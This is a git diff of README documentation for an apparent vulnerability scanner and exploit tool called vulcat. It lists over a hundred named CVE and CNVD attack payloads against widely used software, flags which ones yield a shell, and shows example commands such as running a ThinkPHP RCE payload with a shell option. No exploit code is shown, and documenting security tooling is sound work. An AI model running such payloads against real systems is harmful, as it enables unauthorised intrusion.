+| phpmyadmin-wooyun-2016-199433-unserialize                |  Y  | phpMyadmin 4.8.1 Remote File Inclusion                       |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| phpunit-cve-2017-9841-rce                                |  Y  | PHPUnit Remote code execution                                |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| ruby-on-rails-cve-2018-3760-fileread                     |  Y  | Ruby on Rails Directory traversal                            |
+| ruby-on-rails-cve-2019-5418-fileread                     |  Y  | Ruby on Rails FileRead                                       |
+| ruby-on-rails-cve-2020-8163-rce                          |  -  | Ruby on Rails Remote code execution                          |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| showdoc-cnvd-2020-26585-fileupload                       |  -  | ShowDoc writes to any file                                   |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| spring-security-oauth-cve-2016-4977-rce                  |  -  | Spring Security OAuth2 Remote Command Execution              |
+| spring-data-rest-cve-2017-8046-rce                       |  -  | Spring Data Rest Remote Command Execution                    |
+| spring-data-commons-cve-2018-1273-rce                    |  Y  | Spring Data Commons Remote Command Execution                 |
+| spring-cloud-config-cve-2020-5410-fileread               |  Y  | Spring Cloud Directory traversal                             |
+| spring-boot-cve-2021-21234-fileread                      |  Y  | Spring Boot Directory traversal                              |
+| spring-cloud-gateway-cve-2022-22947-rce                  |  -  | Spring Cloud Gateway SpEl Remote code execution              |
+| spring-cloud-function-cve-2022-22963-rce                 |  Y  | Spring Cloud Function SpEL Remote code execution             |
+| spring-cve-2022-22965-rce                                |  -  | Spring Framework Remote code execution                       |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| supervisor-cve-2017-11610-rce                            |  -  | Supervisor Remote Command Execution                          |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| thinkphp-cve-2018-1002015-rce                            |  Y  | ThinkPHP5.x Remote code execution                            |
+| thinkphp-cnvd-2018-24942-rce                             |  Y  | The forced route is not enabled RCE                          |
+| thinkphp-cnnvd-201901-445-rce                            |  Y  | Core class Request Remote code execution                     |
+| thinkphp-cnvd-2022-86535-rce                             |  -  | ThinkPHP "think-lang" Remote code execution                  |
+| thinkphp-2.x-rce                                         |  -  | ThinkPHP2.x Remote code execution                            |
+| thinkphp-5-ids-sqlinject                                 |  -  | ThinkPHP5 ids SQLinject                                      |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| ueditor-ssrf                                             |  -  | Ueditor SSRF                                                 |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| uwsgiphp-cve-2018-7490-fileread                          |  Y  | uWSGI-PHP Directory traversal                                |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| vmware-vcenter-2020-10-fileread                          |  Y  | In 2020 VMware vCenter 6.5 Any file read                     |
+| vmware-vcenter-cve-2021-21972-fileupload-rce             |  -  | VMware vSphere Client RCE                                    |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| oracle-weblogic-cve-2014-4210-ssrf                       |  -  | Weblogic SSRF                                                |
+| oracle-weblogic-cve-2017-10271-unserialize               |  -  | Weblogic XMLDecoder deSerialization                          |
+| oracle-weblogic-cve-2019-2725-unserialize                |  -  | Weblogic wls9_async deSerialization                          |
+| oracle-weblogic-cve-2020-14750-bypass                    |  -  | Weblogic Authentication bypass                               |
+| oracle-weblogic-cve-2020-14882-rce-unauth                |  Y  | Weblogic Unauthorized command execution                      |
+| oracle-weblogic-cve-2021-2109-rce                        |  -  | Weblogic LDAP Remote code execution                          |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| webmin-cve-2019-15107-rce                                |  Y  | Webmin Pre-Auth Remote code execution                        |
+| webmin-cve-2019-15642-rce                                |  Y  | Webmin Remote code execution                                 |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| yonyou-grp-u8-cnnvd-201610-923-sqlinject                 |  -  | Yonyou-GRP-U8 Proxy SQLinject                                |
+| yonyou-nc-cnvd-2021-30167-rce                            |  Y  | Yonyou-NC BeanShell Remote code execution                    |
+| yonyou-erp-nc-ncfindweb-fileread                         |  -  | Yonyou-ERP-NC NCFindWeb Directory traversal                  |
+| yonyou-u8-oa-getsession-dsinfo                           |  -  | Yonyou-U8-OA getSessionList.jsp Disclosure info              |
+| yonyou-u8-oa-test.jsp-sqlinject                          |  -  | Yonyou-U8-OA test.jsp SQLinject                              |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| zabbix-cve-2016-10134-sqlinject                          |  -  | latest.php or jsrpc.php SQLinject                            |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+vulcat-2.0.0/2023.03.15
+112/Poc
+55/Shell
 ```
 </details>
 
@@ -371,6 +364,7 @@ vulcat-1.2.0/2023.03.01
 * [vulhub](https://github.com/vulhub/vulhub)
 * [vulfocus](https://github.com/fofapro/vulfocus)
 * [ttkbootstrap](https://github.com/israel-dryer/ttkbootstrap/)
+* [Xray](github.com/chaitin/xray)
 
 ## Document
 
diff --git a/README.md b/README.md
index 794d47a..a159b43 100644
--- a/README.md
+++ b/README.md
@@ -1,7 +1,7 @@
 # vulcat
 
 [![python](https://img.shields.io/badge/Python-3-blue?logo=python)](https://shields.io/)
-[![version](https://img.shields.io/badge/Version-1.2.0-blue)](https://shields.io/)
+[![version](https://img.shields.io/badge/Version-2.0.0-blue)](https://shields.io/)
 [![license](https://img.shields.io/badge/LICENSE-GPL-yellow)](https://shields.io/)
 [![stars](https://img.shields.io/github/stars/CLincat/vulcat?color=red)](https://shields.io/)
 [![forks](https://img.shields.io/github/forks/CLincat/vulcat?color=red)](https://shields.io/)
@@ -49,182 +49,188 @@ Usage: python3 vulcat.py <options>
 Examples:
 python3 vulcat.py -h
 python3 vulcat.py --list
-python3 vulcat.py -u https://www.example.com/ -o html
-python3 vulcat.py -u https://www.example.com/ -a httpd --log 3
-python3 vulcat.py -u https://www.example.com/ -a thinkphp -v cnvd-2018-24942
-python3 vulcat.py -f url.txt --delay 0.5
+python3 vulcat.py -u https://www.example.com/
+python3 vulcat.py -f url.txt -o html
+python3 vulcat.py -u https://www.example.com/ -v httpd --log 3
+python3 vulcat.py -u https://www.example.com/ -v cnvd-2018-24942 --shell
 ```
 
-## 漏洞列表
+## 攻击载荷列表
 <details>
-<summary><strong>目前支持检测的漏洞: [点击展开]</strong></summary>
+<summary><strong>以下是vulcat拥有的攻击载荷: [点击展开]</strong></summary>
 
 ```
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Target               | Vuln id            | Vuln Type    | Sh  | Description                                                          |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Alibaba Druid        | (None)             | unAuth       |  -  | 阿里巴巴Druid未授权访问                                              |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Alibaba Nacos        | CVE-2021-29441     | unAuth       |  -  | 阿里巴巴Nacos未授权访问                                              |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Airflow       | CVE-2020-17526     | unAuth       |  -  | Airflow身份验证绕过                                                  |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache APISIX        | CVE-2020-13945     | unAuth       |  -  | Apache APISIX默认密钥                                                |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Druid         | CVE-2021-25646     | RCE          |  Y  | Apache Druid 远程代码执行                                            |
-| Apache Druid         | CVE-2021-36749     | FileRead     |  Y  | Apache Druid 任意文件读取                                            |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Flink         | CVE-2020-17519     | FileRead     |  Y  | Flink目录遍历                                                        |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Hadoop        | (None)             | unAuth       |  -  | Hadoop YARN ResourceManager 未授权访问                               |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Httpd         | CVE-2021-40438     | SSRF         |  -  | Apache HTTP Server 2.4.48 mod_proxy SSRF                             |
-| Apache Httpd         | CVE-2021-41773     | FileRead/RCE |  Y  | Apache HTTP Server 2.4.49 路径遍历                                   |
-| Apache Httpd         | CVE-2021-42013     | FileRead/RCE |  Y  | Apache HTTP Server 2.4.50 路径遍历                                   |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache SkyWalking    | CVE-2020-9483      | SQLinject    |  -  | SkyWalking SQL注入                                                   |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Solr          | CVE-2017-12629     | RCE          |  -  | Solr 远程命令执行                                                    |
-| Apache Solr          | CVE-2019-17558     | RCE          |  Y  | Solr Velocity 注入远程命令执行                                       |
-| Apache Solr          | CVE-2021-27905     | SSRF/FileRead|  Y  | Solr SSRF/任意文件读取                                               |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Tomcat        | CVE-2017-12615     | FileUpload   |  -  | PUT方法任意文件写入                                                  |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Apache Unomi         | CVE-2020-13942     | RCE          |  Y  | Apache Unomi远程表达式代码执行                                       |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| AppWeb               | CVE-2018-8715      | unAuth       |  -  | AppWeb身份认证绕过                                                   |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Atlassian Confluence | CVE-2015-8399      | FileRead     |  Y  | Confluence任意文件包含                                               |
-| Atlassian Confluence | CVE-2019-3396      | FileRead     |  Y  | Confluence路径遍历和命令执行                                         |
-| Atlassian Confluence | CVE-2021-26084     | RCE          |  Y  | Confluence Webwork Pre-Auth OGNL表达式命令注入                       |
-| Atlassian Confluence | CVE-2022-26134     | RCE          |  Y  | Confluence远程代码执行                                               |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Cisco                | CVE-2020-3580      | XSS          |  -  | 思科ASA/FTD XSS跨站脚本攻击                                          |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Discuz               | wooyun-2010-080723 | RCE          |  Y  | 全局变量防御绕过RCE                                                  |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Django               | CVE-2017-12794     | XSS          |  -  | debug page XSS跨站脚本攻击                                           |
-| Django               | CVE-2018-14574     | Redirect     |  -  | CommonMiddleware url重定向                                           |
-| Django               | CVE-2019-14234     | SQLinject    |  -  | JSONfield SQL注入                                                    |
-| Django               | CVE-2020-9402      | SQLinject    |  -  | GIS SQL注入                                                          |
-| Django               | CVE-2021-35042     | SQLinject    |  -  | QuerySet.order_by SQL注入                                            |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Drupal               | CVE-2014-3704      | SQLinject    |  -  | Drupal < 7.32 Drupalgeddon SQL 注入                                  |
-| Drupal               | CVE-2017-6920      | RCE          |  -  | Drupal Core 8 PECL YAML 反序列化代码执行                             |
-| Drupal               | CVE-2018-7600      | RCE          |  Y  | Drupal Drupalgeddon 2 远程代码执行                                   |
-| Drupal               | CVE-2018-7602      | RCE          |  -  | Drupal 远程代码执行                                                  |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| ElasticSearch        | CVE-2014-3120      | RCE          |  Y  | ElasticSearch命令执行                                                |
-| ElasticSearch        | CVE-2015-1427      | RCE          |  Y  | ElasticSearch Groovy 沙盒绕过&&代码执行                              |
-| ElasticSearch        | CVE-2015-3337      | FileRead     |  Y  | ElasticSearch 目录穿越                                               |
-| ElasticSearch        | CVE-2015-5531      | FileRead     |  Y  | ElasticSearch 目录穿越                                               |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| F5 BIG-IP            | CVE-2020-5902      | RCE          |  -  | BIG-IP远程代码执行                                                   |
-| F5 BIG-IP            | CVE-2022-1388      | unAuth/RCE   |  Y  | BIG-IP远程代码执行                                                   |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Fastjson             | CNVD-2017-02833    | unSerialize  |  Y  | Fastjson <= 1.2.24 反序列化                                          |
-| Fastjson             | CNVD-2019-22238    | unSerialize  |  Y  | Fastjson <= 1.2.47 反序列化                                          |
-| Fastjson             | rce-1-2-62         | unSerialize  |  Y  | Fastjson <= 1.2.62 反序列化                                          |
-| Fastjson             | rce-1-2-66         | unSerialize  |  Y  | Fastjson <= 1.2.66 反序列化                                          |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Gitea                | (None)             | unAuth       |  -  | Gitea 1.4.0 未授权访问                                               |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Gitlab               | CVE-2021-22205     | RCE          |  -  | GitLab Pre-Auth 远程命令执行                                         |
-| Gitlab               | CVE-2021-22214     | SSRF         |  Y  | Gitlab CI Lint API未授权 SSRF                                        |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| GoCD                 | CVE-2021-43287     | FileRead     |  Y  | GoCD Business Continuity 任意文件读取                                |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Grafana              | CVE-2021-43798     | FileRead     |  Y  | Grafana 8.x 插件模块路径遍历                                         |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Influxdb             | (None)             | unAuth       |  -  | influxdb 未授权访问                                                  |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| JBoss                | (None)             | unAuth       |  -  | JBoss 未授权访问                                                     |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Jenkins              | CVE-2018-1000861   | RCE          |  Y  | jenkins 远程命令执行                                                 |
-| Jenkins              | (None)             | unAuth       |  Y  | Jenkins 未授权访问                                                   |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Jetty                | CVE-2021-28164     | DSinfo       |  -  | jetty 模糊路径信息泄露                                               |
-| Jetty                | CVE-2021-28169     | DSinfo       |  -  | jetty Utility Servlets ConcatServlet 双重解码信息泄露                |
-| Jetty                | CVE-2021-34429     | DSinfo       |  -  | jetty 模糊路径信息泄露                                               |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Joomla               | CVE-2017-8917      | SQLinject    |  -  | Joomla3.7 Core com_fields组件SQL注入                                 |
-| Joomla               | CVE-2023-23752     | unAuth       |  -  | Joomla 未授权访问                                                    |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Jupyter              | (None)             | unAuth       |  -  | Jupyter 未授权访问                                                   |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Keycloak             | CVE-2020-10770     | SSRF         |  -  | 使用request_uri调用未经验证的URL                                     |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Landray              | CNVD-2021-28277    | FileRead/SSRF|  Y  | 蓝凌OA 任意文件读取/SSRF                                             |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Mini Httpd           | CVE-2018-18778     | FileRead     |  -  | mini_httpd 任意文件读取                                              |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| mongo-express        | CVE-2019-10758     | RCE          |  Y  | 未授权远程代码执行                                                   |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Nexus Repository     | CVE-2019-5475      | RCE          |  Y  | 2.x yum插件 远程命令执行                                             |
-| Nexus Repository     | CVE-2019-7238      | RCE          |  Y  | 3.x 远程命令执行                                                     |
-| Nexus Repository     | CVE-2019-15588     | RCE          |  Y  | 2019-5475的绕过                                                      |
-| Nexus Repository     | CVE-2020-10199     | RCE          |  Y  | 3.x 远程命令执行                                                     |
-| Nexus Repository     | CVE-2020-10204     | RCE          |  Y  | 3.x 远程命令执行                                                     |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Nodejs               | CVE-2017-14849     | FileRead     |  Y  | Node.js目录穿越                                                      |
-| Nodejs               | CVE-2021-21315     | RCE          |  Y  | Node.js命令执行                                                      |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| NodeRED              | CVE-2021-3223      | FileRead     |  Y  | Node-RED 任意文件读取                                                |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| phpMyadmin           | WooYun-2016-199433 | unSerialize  |  -  | phpMyadmin Scripts/setup.php 反序列化                                |
-| phpMyadmin           | CVE-2018-12613     | FileInclude  |  Y  | phpMyadmin 4.8.1 远程文件包含                                        |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| PHPUnit              | CVE-2017-9841      | RCE          |  Y  | PHPUnit 远程代码执行                                                 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Ruby on Rails        | CVE-2018-3760      | FileRead     |  Y  | Ruby on Rails 路径遍历                                               |
-| Ruby on Rails        | CVE-2019-5418      | FileRead     |  Y  | Ruby on Rails 任意文件读取                                           |
-| Ruby on Rails        | CVE-2020-8163      | RCE          |  -  | Ruby on Rails 命令执行                                               |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| ShowDoc              | CNVD-2020-26585    | FileUpload   |  -  | ShowDoc 任意文件上传                                                 |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Spring               | CVE-2016-4977      | RCE          |  -  | Spring Security OAuth2 远程命令执行                                  |
-| Spring               | CVE-2017-8046      | RCE          |  -  | Spring Data Rest 远程命令执行                                        |
-| Spring               | CVE-2018-1273      | RCE          |  Y  | Spring Data Commons 远程命令执行                                     |
-| Spring               | CVE-2020-5410      | FileRead     |  Y  | Spring Cloud目录遍历                                                 |
-| Spring               | CVE-2021-21234     | FileRead     |  Y  | Spring Boot目录遍历                                                  |
-| Spring               | CVE-2022-22947     | RCE          |  -  | Spring Cloud Gateway SpEl远程代码执行                                |
-| Spring               | CVE-2022-22963     | RCE          |  Y  | Spring Cloud Function SpEL远程代码执行                               |
-| Spring               | CVE-2022-22965     | RCE          |  -  | Spring Framework远程代码执行                                         |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Supervisor           | CVE-2017-11610     | RCE          |  -  | Supervisor 远程命令执行                                              |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| ThinkPHP             | CVE-2018-1002015   | RCE          |  Y  | ThinkPHP5.x 远程代码执行                                             |
-| ThinkPHP             | CNVD-2018-24942    | RCE          |  Y  | 未开启强制路由导致RCE                                                |
-| ThinkPHP             | CNNVD-201901-445   | RCE          |  Y  | 核心类Request远程代码执行                                            |
-| ThinkPHP             | CNVD-2022-86535    | RCE          |  -  | ThinkPHP 多语言模块命令执行                                          |
-| ThinkPHP             | rce-2-x            | RCE          |  -  | ThinkPHP2.x 远程代码执行                                             |
-| ThinkPHP             | ids-sqlinject-5    | SQLinject    |  -  | ThinkPHP5 ids参数SQL注入                                             |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Ueditor              | (None)             | SSRF         |  -  | Ueditor编辑器SSRF                                                    |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| uWSGI-PHP            | CVE-2018-7490      | FileRead     |  Y  | uWSGI-PHP目录穿越                                                    |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Oracle Weblogic      | CVE-2014-4210      | SSRF         |  -  | Weblogic 服务端请求伪造                                              |
-| Oracle Weblogic      | CVE-2017-10271     | unSerialize  |  -  | Weblogic XMLDecoder反序列化                                          |
-| Oracle Weblogic      | CVE-2019-2725      | unSerialize  |  -  | Weblogic wls9_async反序列化                                          |
-| Oracle Weblogic      | CVE-2020-14750     | unAuth       |  -  | Weblogic 权限验证绕过                                                |
-| Oracle Weblogic      | CVE-2020-14882     | RCE          |  Y  | Weblogic 未授权命令执行                                              |
-| Oracle Weblogic      | CVE-2021-2109      | RCE          |  -  | Weblogic LDAP 远程代码执行                                           |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Webmin               | CVE-2019-15107     | RCE          |  Y  | Webmin Pre-Auth 远程代码执行                                         |
-| Webmin               | CVE-2019-15642     | RCE          |  Y  | Webmin 远程代码执行                                                  |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Yonyou               | CNNVD-201610-923   | SQLinject    |  -  | 用友GRP-U8 Proxy SQL注入                                             |
-| Yonyou               | CNVD-2021-30167    | RCE          |  Y  | 用友NC BeanShell远程命令执行                                         |
-| Yonyou               | nc-fileread        | FileRead     |  -  | 用友ERP-NC NCFindWeb目录遍历                                         |
-| Yonyou               | u8-oa-getsession   | DSinfo       |  -  | 用友U8 OA getSessionList.jsp 敏感信息泄漏                            |
-| Yonyou               | u8-oa-test-sql     | SQLinject    |  -  | 用友U8 OA test.jsp SQL注入                                           |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-| Zabbix               | CVE-2016-10134     | SQLinject    |  -  | latest.php或jsrpc.php存在sql注入                                     |
-+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
-vulcat-1.2.0/2023.03.01
-108/Poc
-54/Shell
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| Payloads                                                 | Sh  | Description                                                          |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| 74cms-v5.0.1-sqlinject                                   |  -  | 74cms v5.0.1 前台AjaxPersonalController.class.php存在SQL注入         |
+| 74cms-v6.0.4-xss                                         |  -  | 74cms v6.0.4 帮助中心搜索框XSS                                       |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| alibaba-druid-unauth                                     |  -  | 阿里巴巴Druid未授权访问                                              |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| alibaba-nacos-cve-2021-29441-unauth                      |  -  | 阿里巴巴Nacos未授权访问                                              |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-airflow-cve-2020-17526-unauth                     |  -  | Airflow身份验证绕过                                                  |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-apisix-cve-2020-13945-unauth                      |  -  | Apache APISIX默认密钥                                                |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-druid-cve-2021-25646-rce                          |  Y  | Apache Druid 远程代码执行                                            |
+| apache-druid-cve-2021-36749-fileread                     |  Y  | Apache Druid 任意文件读取                                            |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-flink-cve-2020-17519-fileread                     |  Y  | Flink目录遍历                                                        |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-hadoop-unauth                                     |  -  | Hadoop YARN ResourceManager 未授权访问                               |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-httpd-cve-2021-40438-ssrf                         |  -  | Apache HTTP Server 2.4.48 mod_proxy SSRF                             |
+| apache-httpd-cve-2021-41773-rce-fileread                 |  Y  | Apache HTTP Server 2.4.49 路径遍历                                   |
+| apache-httpd-cve-2021-42013-rce-fileread                 |  Y  | Apache HTTP Server 2.4.50 路径遍历                                   |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-skywalking-cve-2020-9483-sqlinject                |  -  | SkyWalking SQL注入                                                   |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-solr-cve-2017-12629-rce                           |  -  | Solr 远程命令执行                                                    |
+| apache-solr-cve-2019-17558-rce                           |  Y  | Solr Velocity 注入远程命令执行                                       |
+| apache-solr-cve-2021-27905-ssrf-fileread                 |  Y  | Solr SSRF/任意文件读取                                               |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-tomcat-cve-2017-12615-fileupload                  |  -  | PUT方法任意文件写入                                                  |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| apache-unomi-cve-2020-13942-rce                          |  Y  | Apache Unomi远程表达式代码执行                                       |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| appweb-cve-2018-8715-unauth                              |  -  | AppWeb身份认证绕过                                                   |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| atlassian-confluence-cve-2015-8399-fileread-fileinclude  |  Y  | Confluence任意文件包含                                               |
+| atlassian-confluence-cve-2019-3396-fileread              |  Y  | Confluence路径遍历和命令执行                                         |
+| atlassian-confluence-cve-2021-26084-rce                  |  Y  | Confluence Webwork Pre-Auth OGNL表达式命令注入                       |
+| atlassian-confluence-cve-2022-26134-rce                  |  Y  | Confluence远程代码执行                                               |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| cisco-cve-2020-3580-xss                                  |  -  | 思科ASA/FTD XSS跨站脚本攻击                                          |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| discuz-wooyun-2010-080723-rce                            |  Y  | 全局变量防御绕过RCE                                                  |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| django-cve-2017-12794-xss                                |  -  | debug page XSS跨站脚本攻击                                           |
+| django-cve-2018-14574-redirect                           |  -  | CommonMiddleware url重定向                                           |
+| django-cve-2019-14234-sqlinject                          |  -  | JSONfield SQL注入                                                    |
+| django-cve-2020-9402-sqlinject                           |  -  | GIS SQL注入                                                          |
+| django-cve-2021-35042-sqlinject                          |  -  | QuerySet.order_by SQL注入                                            |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| drupal-cve-2014-3704-sqlinject                           |  -  | Drupal < 7.32 Drupalgeddon SQL 注入                                  |
+| drupal-cve-2017-6920-rce                                 |  -  | Drupal Core 8 PECL YAML 反序列化代码执行                             |
+| drupal-cve-2018-7600-rce                                 |  Y  | Drupal Drupalgeddon 2 远程代码执行                                   |
+| drupal-cve-2018-7602-rce                                 |  -  | Drupal 远程代码执行                                                  |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| elasticsearch-cve-2014-3120-rce                          |  Y  | ElasticSearch命令执行                                                |
+| elasticsearch-cve-2015-1427-rce                          |  Y  | ElasticSearch Groovy 沙盒绕过&&代码执行                              |
+| elasticsearch-cve-2015-3337-fileread                     |  Y  | ElasticSearch 目录穿越                                               |
+| elasticsearch-cve-2015-5531-fileread                     |  Y  | ElasticSearch 目录穿越                                               |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| f5bigip-cve-2020-5902-rce-fileread                       |  -  | BIG-IP远程代码执行                                                   |
+| f5bigip-cve-2022-1388-unauth-rce                         |  Y  | BIG-IP身份认证绕过RCE                                                |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| fastjson-cnvd-2017-02833-rce                             |  Y  | Fastjson <= 1.2.24 反序列化                                          |
+| fastjson-cnvd-2019-22238-rce                             |  Y  | Fastjson <= 1.2.47 反序列化                                          |
+| fastjson-v1.2.62-rce                                     |  Y  | Fastjson <= 1.2.62 反序列化                                          |
+| fastjson-v1.2.66-rce                                     |  Y  | Fastjson <= 1.2.66 反序列化                                          |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| gitea-unauth-fileread-rce                                |  -  | Gitea 1.4.0 未授权访问                                               |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| gitlab-cve-2021-22205-rce.py                             |  -  | GitLab Pre-Auth 远程命令执行                                         |
+| gitlab-cve-2021-22214-ssrf                               |  Y  | Gitlab CI Lint API未授权 SSRF                                        |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| gocd-cve-2021-43287-fileread                             |  Y  | GoCD Business Continuity 任意文件读取                                |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| grafana-cve-2021-43798-fileread                          |  Y  | Grafana 8.x 插件模块路径遍历                                         |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| influxdb-unauth                                          |  -  | influxdb 未授权访问                                                  |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| jboss-unauth                                             |  -  | JBoss 未授权访问                                                     |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| jenkins-cve-2018-1000861-rce                             |  Y  | jenkins 远程命令执行                                                 |
+| jenkins-unauth                                           |  Y  | Jenkins 未授权访问                                                   |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| jetty-cve-2021-28164-dsinfo                              |  -  | jetty 模糊路径信息泄露                                               |
+| jetty-cve-2021-28169-dsinfo                              |  -  | jetty Utility Servlets ConcatServlet 双重解码信息泄露                |
+| jetty-cve-2021-34429-dsinfo                              |  -  | jetty 模糊路径信息泄露                                               |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| joomla-cve-2017-8917-sqlinject                           |  -  | Joomla3.7 Core com_fields组件SQL注入                                 |
+| joomla-cve-2023-23752-unauth                             |  -  | Joomla 未授权访问                                                    |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| jupyter-unauth                                           |  -  | Jupyter 未授权访问                                                   |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| keycloak-cve-2020-10770-ssrf                             |  -  | 使用request_uri调用未经验证的URL                                     |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| landray-oa-cnvd-2021-28277-ssrf-fileread                 |  Y  | 蓝凌OA 任意文件读取/SSRF                                             |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| minihttpd-cve-2018-18778-fileread                        |  -  | mini_httpd 任意文件读取                                              |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| mongoexpress-cve-2019-10758-rce                          |  Y  | 未授权远程代码执行                                                   |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| nexus-cve-2019-5475-rce                                  |  Y  | 2.x yum插件 远程命令执行                                             |
+| nexus-cve-2019-7238-rce                                  |  Y  | 3.x 远程命令执行                                                     |
+| nexus-cve-2019-15588-rce                                 |  Y  | 2019-5475的绕过                                                      |
+| nexus-cve-2020-10199-rce                                 |  Y  | 3.x 远程命令执行                                                     |
+| nexus-cve-2020-10204-rce                                 |  Y  | 3.x 远程命令执行                                                     |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
